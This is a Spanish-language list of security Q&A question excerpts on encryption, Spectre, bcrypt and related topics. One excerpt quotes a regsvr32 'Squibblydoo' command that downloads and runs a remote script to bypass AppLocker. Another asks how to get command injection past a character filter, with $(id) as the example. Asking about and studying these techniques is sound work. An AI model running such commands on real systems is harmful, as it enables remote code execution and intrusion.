Todas las preguntas

1
respuesta

¿Un hash firmado revela alguna información sobre el mensaje original?

Como parte del cifrado de extremo a extremo de mi aplicación, estoy siguiendo el procedimiento estándar de usar RSA para intercambiar la clave temporal AES256. Actualmente, cuando A decide la clave para enviar a B, la cifra con la clave pública...
pregunta 18.03.2018 - 02:16
1
respuesta

Mitigación del software para Specter v2

Ejecuto Debian como mi SO y Guix como mi gestor de paquetes. También corro (aproximadamente) el último kernel construido usando Guix. Según specter-meltdown-checker , mi kernel tiene mitigación para v1, v2 y v3. Sin embargo, el último GC...
pregunta 14.02.2018 - 18:13
1
respuesta

¿Cómo funciona este bypass de AppLocker exactamente? ("Squibblydoo")

He leído en algunos blogs acerca de un truco llamado "Squibblydoo", donde el siguiente comando puede omitir el Windows AppLocker: regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll Donde la URL apunta a un archivo de secuencia de comandos q...
pregunta 05.04.2018 - 18:54
2
respuestas

aWallet Password Manager

NOTA: Esta pregunta es una subparte de la pregunta original en un Administrador de contraseñas de Wallet publicado en Cryptography.StackExchange. Como sugerido por @SEJPM , lo estoy publicando aquí desde el tema de la pregunta es más adecua...
pregunta 09.04.2018 - 03:27
1
respuesta

Ejecute el comando bash cuando haya espacios y '' / \? & | se filtran?

Tengo algún código PHP que ejecuta comandos bash y tiene un error que puede hacerlo vulnerable a la ejecución remota de código. El comando ejecutado sería $(id) , pero si ejecuto cualquier otro comando como ls -la , el espacio se...
pregunta 09.04.2018 - 01:55
1
respuesta

¿Qué detalles de activos son los más relevantes en un procedimiento de evaluación de riesgos de seguridad cibernética?

Estoy identificando los activos de la organización para una evaluación de riesgos de seguridad cibernética. Estoy buscando guías o las mejores prácticas de la industria para conocer qué detalles de activos son realmente útiles para el procedimie...
pregunta 23.02.2018 - 13:50
2
respuestas

¿Qué significan los datos de texto de cifrado idénticos en el modo de encadenamiento de bloques de cifrado (CBC)?

Estoy tratando de entender las opciones de la siguiente pregunta Según mi entendimiento, ninguna de las opciones se aplica porque el texto sin formato para el primer bloque resaltado es 1F2..CA2, que es la entrada del segundo bloque res...
pregunta 24.04.2018 - 17:05
1
respuesta

¿Qué tan graves son las fallas de AMD reveladas de manera interesante?

CTS reveló varias "fallas" en los chips de arquitectura AMD Ryzen. Estas fallas se llaman Ryzenfall, Masterkey, Fallout y Chimera ( enlace ). Sin embargo, varios sitios de tecnología (por ejemplo, Wired ) y blogs plantearon preguntas sobre los...
pregunta 14.03.2018 - 12:57
1
respuesta

¿Pueden los sitios web hacer un seguimiento de las pestañas que abre mientras está conectado a su sitio web?

Si estoy en Chrome y estoy buscando un producto en Amazon en la pestaña A, ¿pueden decirme en qué busco si abro una pestaña B mientras la pestaña A todavía está abierta? ¿Debo usar un nuevo chrome u otra ventana del navegador para aumentar la se...
pregunta 25.02.2018 - 22:40
1
respuesta

bcrypt ¿no es necesario almacenar sal?

Estoy confundido con bcrypt, creo que necesitaría almacenar mi sal, y luego comparar mi contraseña de texto sin formato + sal con la contraseña con hash, sin embargo, de la documentación no parece que sea necesario almacenar la sal en absoluto ....
pregunta 28.04.2018 - 14:33